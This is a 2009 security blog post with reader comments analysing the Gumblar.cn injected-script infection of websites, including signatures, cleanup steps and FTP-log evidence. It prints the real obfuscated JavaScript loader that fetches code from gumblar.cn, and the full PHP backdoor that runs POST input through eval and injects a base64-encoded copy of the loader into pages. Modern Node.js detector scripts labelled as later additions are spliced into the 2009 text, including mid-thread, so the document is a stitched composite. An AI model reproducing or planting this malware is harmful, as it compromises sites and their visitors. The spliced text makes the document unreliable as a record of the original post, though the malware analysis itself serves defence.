Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Gumblar .cn Exploit – 12 Facts About This Injected Script

   07 May 09   Filed in Website exploits

I’ve been watching this exploit for about a week now. During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However, I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this:

(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2 Every infected site has its own modification of the script. However, every modification has common parts and can be easily identified as the gumblar .cn script.

  1. The script starts with “(function(”
  2. The function has no name. It is anonymous and self-invoking.
  3. The script is obfuscated, i.e. some characters are replaced with their numeric codes, and then the “%” character is replaced with some arbitrary character. Here are some sample excerpts of the encoded data: “…20a.3d.22Sc.72iptEngin.65…”, “…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…”, “…v_61_72_20_61_3d_22_53_63rip_74E_6e…”
  4. Near the end of the script there is a “.replace(” call.
  5. If the function accepts parameters, at the very end you’ll find a simple regular expression like /”/g or /~/g, etc. that restores the mangled “%” character.

3 When the script is executed (every time someone visits the infected web page), another script from “gumblar . cn/rss/” is silently loaded and executed.

4 This code is usually injected right before the <body> tag. I saw a web page with eight(!) <body> tags (yeah, invalid HTML) and the gumblar scripts were injected before each of them.

5 Sometimes I encounter this script on sites infected with the malicious iframes that I reviewed in my recent posts. So this exploit may use the same infection technique, and probably the same clean-up steps can be applied.

6 Unlike the recent iframe exploits, where the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.) this gumblar script is injected into every web page.

7 This script is also injected into .js (JavaScript) files. Usually at the very bottom.
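The structural signature in fact 2 is enough to find these scripts without ever running them. The following Node.js script is an added example, not code from the original post: it locates blocks that match the signature, decodes the payload statically by doing the same replace-plus-unescape the script would do (but never `eval`), reports where the decoded code points (fact 3), and strips the block from HTML (the before-`<body>` injection of fact 4) or from a .js file (fact 7). The obfuscated sample is constructed inside the script; the host name `gumblar.example` is a placeholder.

```javascript
// Added example; not code from the original post. Finds Gumblar-style
// obfuscated scripts by the structural signature in fact 2, decodes the
// payload statically (replace + unescape, never eval), and strips it.
// The sample below is constructed here; "gumblar.example" is a placeholder.

// --- constructed test fixture in the shape of the injected script ---
function encodeWithSeparator(js, sep) {
  // every non-alphanumeric character becomes <sep> + two hex digits
  return js.replace(/[^A-Za-z0-9]/g,
    (c) => sep + c.charCodeAt(0).toString(16).padStart(2, '0'));
}
const HIDDEN_JS = 'document.write("<script src=//gumblar.example/rss/?id=1><\\/script>");';
const SAMPLE_BLOCK = "(function(jil){var xR5p='%';eval(unescape(('" +
  encodeWithSeparator(HIDDEN_JS, '~') + "').replace(jil,xR5p)))})(/~/g);";
const SAMPLE_HTML = '<html><head><script>var ok = 1;</script></head>\n' +
  '<script>' + SAMPLE_BLOCK + '</script><body><p>hi</p></body></html>';

// Fact 2 signature: anonymous self-invoking "(function(" ... "})(" that
// contains a ".replace(" call. Returns each block with its offsets.
function findObfuscatedBlocks(text) {
  const found = [];
  let from = 0;
  for (;;) {
    const start = text.indexOf('(function(', from);
    if (start < 0) break;
    const tail = text.indexOf('})(', start);
    if (tail < 0) break;
    const close = text.indexOf(');', tail);
    if (close < 0) break;
    const end = close + 2;
    const block = text.slice(start, end);
    if (block.includes('.replace(')) found.push({ start, end, block });
    from = end;
  }
  return found;
}

// Fact 2.5: the character standing in for "%" is the trailing /X/g argument,
// or an inline .replace(/X/g, '%') in variants that take no parameter.
function separatorOf(block) {
  const tail = block.match(/\)\s*\(\s*\/(.)\/g\s*\)\s*;?\s*$/);
  if (tail) return tail[1];
  const inline = block.match(/\.replace\(\s*\/(.)\/g\s*,/);
  return inline ? inline[1] : null;
}

// The longest quoted literal in the block is the mangled payload
function payloadOf(block) {
  let best = '';
  for (const m of block.matchAll(/'([^']*)'|"([^"]*)"/g)) {
    const s = m[1] !== undefined ? m[1] : m[2];
    if (s.length > best.length) best = s;
  }
  return best;
}

// Static decode: restore "%" and unescape, without executing anything
function decodeBlock(block) {
  const sep = separatorOf(block);
  const payload = payloadOf(block);
  if (!sep || !payload) return null;
  return unescape(payload.split(sep).join('%'));
}

// Triage: does the decoded code write a <script>, and where does it point?
function analyzeBlock(block) {
  const decoded = decodeBlock(block);
  if (decoded === null) return { suspicious: false, loadsScript: null, decoded: null };
  const src = decoded.match(/src\s*=\s*["']?([^"'\s>]+)/);
  return {
    suspicious: /document\.write|eval\(/.test(decoded),
    loadsScript: src ? src[1] : null,
    decoded,
  };
}

// Remove detected blocks. When a block is the whole body of a <script>
// element (fact 4) the element goes too; in a .js file (fact 7) only the
// block itself is removed. Processing right-to-left keeps offsets valid.
function stripObfuscatedBlocks(text) {
  const onlyComment = (t) => t !== null && /^\s*(<!--|-->)?\s*$/.test(t);
  let out = text;
  for (const { start, end } of findObfuscatedBlocks(text).reverse()) {
    let s = start, e = end;
    const open = out.lastIndexOf('<script', s);
    const tagEnd = open >= 0 ? out.indexOf('>', open) : -1;
    const closeTag = out.indexOf('</script>', e);
    const before = tagEnd >= 0 ? out.slice(tagEnd + 1, s) : null;
    const after = closeTag >= 0 ? out.slice(e, closeTag) : null;
    if (onlyComment(before) && onlyComment(after)) {
      s = open;
      e = closeTag + '</script>'.length;
    }
    out = out.slice(0, s) + out.slice(e);
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const b of findObfuscatedBlocks(SAMPLE_HTML)) console.log(analyzeBlock(b.block));
  console.log(stripObfuscatedBlocks(SAMPLE_HTML));
}
```

Run it with `node gumblar-scan.js` (any file name). The separator lookup handles both the parameterised form shown in fact 1 and the variants that call `.replace(/X/g,'%')` inline, which is why the decode never relies on a fixed character or domain; the clean-up step is deliberately conservative and only removes the surrounding `<script>` element when nothing but the block (and an HTML comment marker) sits inside it.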

8 Maybe it’s just a coincidence, but about 95% of the infected sites used PHP. It is not possible to say for sure whether the rest used PHP. Who knows.

9 This exploit doesn’t rely on any particular script vulnerability. I encountered it on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, and on proprietary PHP sites.

10 Some people reported that the following code is injected into PHP files:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;}
function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

The base64-encoded part is this gumblar .cn script.

This PHP code, its structure and variable names (tmp_lkojfghx, tmp_lkojfghx3, TMP_XHGFJOKL) are the same as in the infamous fake Yahoo counter exploit. Only the injected JavaScript is different. Maybe it was created by the same people, or maybe just the same exploitation kit was used.
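Because the variable names change between kits, a scanner for the PHP side is more robust when it keys on what the injected code does rather than on `tmp_lkojfghx`: it evaluates a POST parameter, builds a constant from a long `base64_decode()` literal that decodes to a `<script>` tag, installs an output-buffer callback that rewrites the page, and abuses `set_error_handler()` to keep that callback installed. The Node.js script below is an added example, not code from the original post or from any project it mentions; the PHP fixture it scans is constructed in that shape, and its base64 payload is a harmless placeholder rather than the real injected script.

```javascript
// Added example; not code from the original post. Scans PHP source for the
// structural traits of the injected code in fact 10. The fixture below is
// constructed; its base64 payload is a placeholder, not the real script.

const PLACEHOLDER_PAYLOAD =
  Buffer.from('<script>/* placeholder payload */</script>').toString('base64');
const INFECTED_PHP =
  "<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))" +
  "eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))" +
  "define('TMP_XHGFJOKL',base64_decode('" + PLACEHOLDER_PAYLOAD + "'));" +
  "function tmp_lkojfghx($s){if(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));return $s;}" +
  "function tmp_lkojfghx2(){ob_start('tmp_lkojfghx');}}" +
  "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;" +
  "tmp_lkojfghx2(); ?>\n<?php echo 'real page'; ?>";
const CLEAN_PHP =
  "<?php\nob_start('ob_gzhandler');\n$x = base64_decode('aGVsbG8=');\necho htmlspecialchars($x);\n";

// Each rule is structural, not name-based, so renamed variants still match.
// ob_start('ob_gzhandler') is a common legitimate callback and is excluded.
const RULES = [
  { id: 'eval_of_request_input', re: /\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b/ },
  { id: 'output_buffer_callback', re: /\bob_start\s*\(\s*['"](?!ob_gzhandler['"])\w+['"]/ },
  { id: 'error_handler_hook', re: /\bset_error_handler\s*\(/ },
  { id: 'gzip_aware_rewrite', re: /\bgzinflate\s*\(|chr\(31\)\.chr\(139\)/ },
];

// Long base64 literals passed to base64_decode() that decode to a <script> tag
function decodedScriptPayloads(src) {
  const out = [];
  for (const m of src.matchAll(/base64_decode\s*\(\s*['"]([A-Za-z0-9+\/=]{40,})['"]\s*\)/g)) {
    const decoded = Buffer.from(m[1], 'base64').toString('latin1');
    if (/<script\b/i.test(decoded)) out.push(decoded);
  }
  return out;
}

function scanPhpSource(src) {
  const indicators = RULES.filter((r) => r.re.test(src)).map((r) => r.id);
  const payloads = decodedScriptPayloads(src);
  if (payloads.length) indicators.push('base64_script_payload');
  // the injection is one self-contained <?php ... ?> block on the first line
  const firstLine = src.split('\n')[0];
  if (/^<\?php\s+if\s*\(\s*!function_exists\(/.test(firstLine) && /\?>\s*$/.test(firstLine)) {
    indicators.push('prepended_php_block');
  }
  return { indicators, payloads, verdict: indicators.length >= 2 ? 'infected' : 'clean' };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scanPhpSource(INFECTED_PHP));
  console.log(scanPhpSource(CLEAN_PHP));
}
```

The verdict requires two independent indicators so that a single `set_error_handler()` call in ordinary application code does not trip it; the decoded payload is returned so it can be fed to a separate JavaScript-side check rather than trusted on the strength of the base64 alone.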

11 This is not a server-wide exploit. I checked several servers with infected sites. Most of the neighbor sites were clean.

12 Gumblar .cn domain is currently blacklisted by Google.

Removal

Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

Then (from a clean computer) change FTP passwords.

Try not to store them inside programs that you use to upload files to a server.

Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do this is to replace them with clean files from a backup.

If you have more facts about this exploit, please post them in the comment section below.

May 10, 2009. Update…

Round Up of the Comments

The comments section of this blog post contains a lot of additional useful facts from webmasters of infected sites.  Be sure to read them.

Zork noticed that his site’s .htaccess file was modified.

Jason talks about what this exploit does from a visitor’s point of view. Of course, a visitor can be a webmaster of another site.

adel sarlak mentioned that this exploit also adds image.php files into image directories. It can also change directory permissions.

James also elaborates on the scripts in image.php and some other .php files. He suggests a shell command to find infected files.

C Filorux shared information about a POST-and-eval backdoor script found on an infected site.

rad-one posted a PHP script that scans all files from your site looking for the exploit signatures. It looks incomplete and you might need to finish it before using it.

More removal instructions from Neil Williams.

Great comment from web host LarryL, who deliberately infected a PC to find out how this virus works. With this information, he suggests a strategy for preventing re-infection.

Thanks for sharing this info. If anyone wants to publish an article about how they fought the infection or the impact of the infection, please contact me – I can publish it here as a guest post. I’m also looking for “hardening a website” tips and tricks.

P.S. I suggest that you use Unmask Parasites to check if your site is infected. It’s safe and fast.


Reader's Comments (194)

  1. |

    [...] http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/co… [...]

  2. |

    [...] Here is some excellent reading on JSRedir-R and how it all gets started: http://www.theregister.co.uk/2009/05/15/script_menace/ [...]

  3. |

    Here is the process I used to clean gumblar.cn off of our site, and it appears to have worked. (still waiting to see if it comes back)

    I used the “Replace in Files” feature of Visual Studio 2008, which saved me from manually removing malicious code from more than 350 files. If you don’t have Visual Studio 2008, there may be other text-editors with Find/Replace features that will work, but I haven’t tried anything else.

    DISCLAIMER: I tried to make the searches specific enough that they will only find the bad gumblar code and remove it, but there is always the chance that these searches will find and replace legitimate code. USE AT YOUR OWN RISK, or if you are concerned you may want to step through each match one by one to ensure that it is actually a match. At the very least, back up the files first, just in case.

    STEPS:

    1) If possible, turn off FTP and Web Services

    2) In Visual Studio, use Ctrl-Shift-F to open the Find in Files dialog.

    3) Enter the path to your web site root in the “Look in” box. Uncheck the ‘Match whole word’ box. Check the ‘Use’ box and select ‘Wildcards’.

    4) In the ‘Look at these filetypes’ box, enter: *.php; *.js, *.html

    5) Perform the following searches. This is a good chance to review the results before switching to ‘Replace in Files’ mode and doing a ‘Replace All’.

    SEARCH #1:<script language=javascript><!–*\n*\n*<body>
    REPLACE WITH: <body>
    Run this search several times, until no results are found (some files may have multiple occurrences, and it only removes them one at a time).

    SEARCH #2: <?php if(!function_exists(’tmp_lkojfghx’)*tmp_lkojfghx2(); ?>
    REPLACE WITH: nothing

    SEARCH #3: <?php eval(base64_decode(*c7′)); ?>
    REPLACE WITh: nothing

    SEARCH #4: <!–*\n*(function(*.replace(*\n*–>
    REPLACE WITH: nothing

    6) Once the searches are done, find any folders called ‘images’. They should each have an ‘images.php’ file, which should now be empty. Change permissions on these files so that no user can alter or modify them.

    7) Change the passwords on any accounts used to access the server by FTP. It may also be a good idea to change other admin account passwords, just to be safe.

    8) Turn FTP and Web services back on, and then periodically use the searches above to see if the infection returns.

    These steps worked for me, but may not work as well in other cases. I hope they can be of use to some of you, though. :) Good luck, and take care!

    -Kevin

  4. |

    Ok, the restrictions on posting code on this site are really frustrating. (It removed most of my search strings).

    I put the instructions up on a blog so everyone can see. I hope I can post a simple URL here. :p

    http://kevinharvie.wordpress.com/

    -Kevin

  5. |

    Removal tool:
    I manage a dedicated server and have been infected in over 200 domains. I created a script that scans all files on the server and if it finds an infection (gumblar line code) it is removed and the file is cleaned.

    Read the comment lines to run the script, first to clean .php files and then other .js .html .htm files.
    ______________________________________________

    <?php
    // Return the lower-cased extension of a file name
    function encontrar_extension($fichero) {
        $fichero = strtolower($fichero);
        $extension = preg_split('#[/\\\\.]#', $fichero);
        $n = count($extension) - 1;
        return $extension[$n];
    }

    function listar_directorios_ruta($ruta) {
        // open a directory and walk it recursively
        if (is_dir($ruta)) {
            if ($dh = opendir($ruta)) {
                while (($file = readdir($dh)) !== false) {
                    //echo "File name: $file : is a: " . filetype($ruta . $file);
                    if (is_dir($ruta . $file) && $file != "." && $file != "..") {
                        listar_directorios_ruta($ruta . $file . "/");
                    } else {
                        $ext = encontrar_extension($file);
                        //if ($ext == "js" || $ext == "html" || $ext == "htm") { // To clean .js, .html, .htm files uncomment this line and comment the line below
                        if ($ext == "php") {
                            $save = false;
                            $cont = file($ruta . $file);
                            foreach ($cont as $id => $art) {
                                // $palabra = 'gumblar'; // To clean .js, .html, .htm files uncomment this line and comment the line below
                                $palabra = 'tmp_lkojfghx';
                                // If the line contains $palabra and 'eval', the file is infected
                                if (stripos($art, $palabra) !== false && stripos($art, 'eval') !== false) {
                                    echo "\nInfeccion en $ruta$file --> linea $id:" . $art . "\n";
                                    //unset($cont[$id]); // To clean .js, .html, .htm files uncomment this line and comment the line below
                                    $cont[$id] = "<?php\n";
                                    $save = true;
                                }
                            }
                            $cont_new = implode('', $cont);
                            if ($save) {
                                $f = fopen($ruta . $file, 'w');
                                fwrite($f, $cont_new);
                                fclose($f);
                            }
                        }
                    }
                }
                closedir($dh);
            }
        } else {
            echo "Error";
        }
    }

    $dir = "/var/www/";
    listar_directorios_ruta($dir);
    ?>

    • |

      In this line :
      // $palabra=’gumblar’; To clean files .js,.html,.htm uncomment this line and comment line below
      Change gumblar to gumbla. There are code lines that contain 20a.3d.22Sc.12gumbla20a.3d.22Sc. and others 20a.3d.22Sc.12gumblar20a.3d.22Sc. So by finding ‘gumbla’ my script locates these 2 lines.

      • |

        You should not count on this. Every site has its own copy of the script where they encode random characters.

        E.g. ~2f~67umblar~2ecn or “2f”2fgumbl“61r”2ec
        (these samples are from real sites)

  6. |

    [...] instead of ——- EMERGENCY ——– If you’re looking for “martuz.cn” info, just watch here Gumblar .cn Exploit – 12 Facts About This Injected Script gumblar.cn and martuz.cn same IP ADDRESS. Unfortunately, you’ll have yielded same behavior for [...]

  7. |

    I’m infected on three client sites and one is currently blocked by Goog.

    Can someone tell me how to write permissions for a new image.php file or point me to a resource? Thanks in advance.

    Also check to see if you have any additional adobe plugins for your browsers. I suspect this could be an issue, but I don’t have verifiable data.

  8. |

    Hello,
    I have taken those broken script ideas a little further, and developed a small application that will check all your files and folders, and will destroy the malicious GUMBLAR code in your affected files.

    The program will list all potentially infected files, and will try to clean
    them. If successful, a “CLEANED” notification will be displayed.

    Download the zip file from our site, http://www.axxis.gr
    Go to the ‘Customer Login’ page
    ( http://www.axxis.gr/index.php?option=com_customersupport )

    We suggest you run this program periodically, to be sure your files are
    healthy! ;)

    • |

      Attention!

      I didn’t test the script. It may modify your files and in case of bugs you may lose sensitive data. If you decide to give this script a try, make sure you have a backup of all your server files.

      Use it at your own risk.

      • |

        The script will NOT make you lose any data, as it targets SPECIFICALLY GUMBLAR CODE! And when it finds “gifimg.php” or “image.php”, it simply empties them.

        The html file injection gets completely cleaned.

        The php file injection is rendered harmless, by
        1. changing condition execution to “if (1!=1)” so it never gets executed
        2. deleting completely this line:
        “if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2′)$GLOBALS['tmp_xhgfjokl']=$a;”
        3. deleting function call “tmp_lkojfghx2();”

        I have not been able to target JS code, as my js files did not get infected.

        The distinctive characteristic of gumblar is its ability of morphing, so this script may need additional checks in the future. You are all welcome to send your “version” of gumblar code, and I will try to fix this too.

        • |

          Erasing the contents of files named “image.php” can be very hazardous to some CMS systems, including WordPress.

        • |

          When I ran this file on my webserver, I got the following PHP error

          Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/miketr2/public_html/file_checker.php on line 108

          • |

            I’ve taken into consideration your comment Shawn, and now the image.php files are being emptied only when gumblar code is found in them.

  9. |

    If you are running a vBulletin site, you are FAR better off to copy over the distribution files with a clean set. At a minimum, you should run the “Suspect Files” utility in the admincp maintenance utility. It will at least tell you which files are not “original” and give you some idea of the scope of your problem. Frankly, I would not take any chances, bite the bullet and replace what there with a clean set of files. The key problem to solve is the one on your local PC. If you don’t find and fix the trojan, you can expect that it will reinfect your site no matter what you do there.

    For vBulletin users, I will add some more info as I get it here, http://www.vbplusme.com/showthread.php?t=528. This exploit was reported but not identified as Gumblar.cn a couple of weeks ago.

  10. |

    Nice post.

    And a very good comment from Kevin.

    But I think restoring from a clean backup would be more safe and easier for most of the sites.

    For dynamically updated sites, we should not restore folders that get updated via user interaction, but take pain to clean them up.

  11. |

    A commenter on my site just posted a whole rash of code she found in one of the image.php files. Looking at it closely, it looks like this is the infection script:

    http://www.techknowme.com/blog/2009/05/fighting-the-jsredir-r-gumblarcn-trojan/comment-page-1/#comment-2

  12. |

    Bunches of ASP and ASPx files on our website were also infected.

    • |

      Are you sure they are infected with “Gumblar”? There are many other exploits.

      • |

        “Gumblar” will hit any htm, html, asp, aspx or php file that has a body tag in it and append itself to the bottom of any js file. On one clients site it also attempted to overwrite the htaccess file (permissions forbade it).

  13. |

    [...] http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  14. |

    [...] There have been some useful scripts posted in the comments about this virus at blog.unmaskparasites.com. [...]

  15. |

    how can I remove it from my rss feed?

  16. |

    [...] is some coverage about it: http://blog.scansafe.com/ http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  17. |

    [...] infects a web server, I’d love to hear it. Between the information I’ve gleaned over at Unmask Parasites and in the comments of the last post, I think a lot of folks have been helped out, and I’d [...]

  18. |

    Not sure if it will help, but one of our customers’ websites was completely riddled with this. During my research – and in the process finding this site :-) – I noticed that the ftp logs show that all the affected files on the site were downloaded, then immediately uploaded (slightly larger file size) from i.p. 74.52.26.66 between May 18 18:38:39 and May 18 18:39:32 (358 transfers total).

    • |

      One of our clients’ computers was infected with the client-side portion of the virus. It’s a trojan that monitors all FTP traffic, sending the auth details back to the payload server (gumblar.cn).

      A short period after the infected CLIENT uses FTP (from an hour to 6 hours), another IP address (a server with a very fast connection) will connect via FTP and iterate through a number of files downloading, infecting, then reuploading them almost immediately. In this way, several hundred files across multiple folders can be infected in less than a minute.

      Removing the web-based portion of the infection is ONLY a stop-gap. You MUST remove the infection from the user’s computer that is causing the FTP auth details to be sent to gumblar or you’re just going to create a vicious cycle of removing infections.

    • |

      Hi Jules,
      I noticed similar behavior from a .my IP 174.37.54.19.

      Apart from downloading every file on the site, and uploading select versions with a slightly larger size (but not for EVERY file), I also noticed the client run some odd commands:
      Sat May 16 22:12:15 2009
      OK CHMOD: Client “174.37.54.19″, “/htdocs/tinymce/jscripts/tiny_mce 0755″
      OK DELETE: Client “174.37.54.19″, “/htdocs/tinymce/jscripts/tiny_mce/tiny_mce_src.js”
      OK UPLOAD: Client “174.37.54.19″, “/htdocs/tinymce/jscripts/tiny_mce/tiny_mce_src.js”, 209682 bytes, 38.79Kbyte/sec

      Strange behaviour for an automated dropper-worm that one would presume is running on infected shell accounts…

      • |

        Oops, sorry – the .my comment was from another issue I’m investigating – this IP from the Gumblar dropper was via a Dallas site! :)
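The FTP-log pattern the commenters above describe (one client downloading a file and re-uploading a slightly larger copy seconds later, repeated across hundreds of files in under a minute) can be picked out of a transfer log automatically. The Node.js script below is an added example, not code from the post or from any commenter: it pairs each UPLOAD with the preceding DOWNLOAD of the same path by the same client and alerts on clients that rewrite several files within a short gap. The log lines are constructed in the same style as the ones quoted above; the addresses 192.0.2.10 and 198.51.100.7 and the timestamps are placeholders, not data from any real incident.

```javascript
// Added example; not code from the post or its comments. Detects the
// download-then-reupload burst described above in FTP transfer logs.
// The log lines are constructed; IPs and timestamps are placeholders.

const SAMPLE_FTP_LOG = [
  'May 18 18:38:39 OK DOWNLOAD: Client "192.0.2.10", "/htdocs/index.php", 3180 bytes',
  'May 18 18:38:40 OK UPLOAD: Client "192.0.2.10", "/htdocs/index.php", 3902 bytes',
  'May 18 18:38:41 OK DOWNLOAD: Client "192.0.2.10", "/htdocs/js/main.js", 12010 bytes',
  'May 18 18:38:42 OK UPLOAD: Client "192.0.2.10", "/htdocs/js/main.js", 12732 bytes',
  'May 18 18:38:44 OK DOWNLOAD: Client "192.0.2.10", "/htdocs/about.html", 2100 bytes',
  'May 18 18:38:45 OK UPLOAD: Client "192.0.2.10", "/htdocs/about.html", 2822 bytes',
  // an ordinary edit session: one file, a long gap, and a smaller upload
  'May 18 09:12:03 OK DOWNLOAD: Client "198.51.100.7", "/htdocs/news.html", 5000 bytes',
  'May 18 09:41:50 OK UPLOAD: Client "198.51.100.7", "/htdocs/news.html", 4800 bytes',
];

const LINE_RE = /^(\w{3} \d{1,2} \d{2}:\d{2}:\d{2}) OK (DOWNLOAD|UPLOAD): Client "([^"]+)", "([^"]+)", (\d+) bytes/;
const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// Parse one transfer line; returns null for lines in another format
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [mon, day, hms] = m[1].split(' ');
  const [h, mi, s] = hms.split(':').map(Number);
  // the log carries no year; 2009 (the year of the post) is assumed, and
  // only differences between timestamps are used anyway
  const ts = Date.UTC(2009, MONTHS[mon], Number(day), h, mi, s) / 1000;
  return { ts, op: m[2], client: m[3], path: m[4], bytes: Number(m[5]) };
}

// Pair each UPLOAD with the latest DOWNLOAD of the same path by the same
// client; count it as a rewrite when the upload follows within maxGapSec
// and the file grew. Alert on clients with at least minFiles rewrites.
function findRewriteBursts(lines, { maxGapSec = 60, minFiles = 3 } = {}) {
  const lastDownload = new Map(); // "client|path" -> download event
  const perClient = new Map();    // client -> rewrite hits
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev) continue;
    const key = ev.client + '|' + ev.path;
    if (ev.op === 'DOWNLOAD') { lastDownload.set(key, ev); continue; }
    const dl = lastDownload.get(key);
    if (!dl) continue;
    const gap = ev.ts - dl.ts;
    if (gap >= 0 && gap <= maxGapSec && ev.bytes > dl.bytes) {
      if (!perClient.has(ev.client)) perClient.set(ev.client, []);
      perClient.get(ev.client).push({ path: ev.path, gapSec: gap, grewBy: ev.bytes - dl.bytes });
    }
  }
  const alerts = [];
  for (const [client, hits] of perClient) {
    if (hits.length >= minFiles) alerts.push({ client, files: hits.length, hits });
  }
  return alerts;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findRewriteBursts(SAMPLE_FTP_LOG), null, 2));
}
```

The thresholds are deliberately loose defaults; on a real server the 60-second gap and the three-file minimum should be tuned against normal deployment traffic, and the "file grew" condition is what separates this injection (which only ever adds code) from an ordinary round of edits. An alert from this check is the cue to treat the FTP credentials as stolen and to start with the workstation, as the reply above says, rather than only cleaning the files.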

  19. |

    Argh! This has hit 5 websites I’ve been working on lately..

    this is what was embedded on them (after unescape)
    ——————————————
    if(!myia){document.write(unescape( ”));}var myia=true;
    ——————————————

    Nightmare!!

    • |

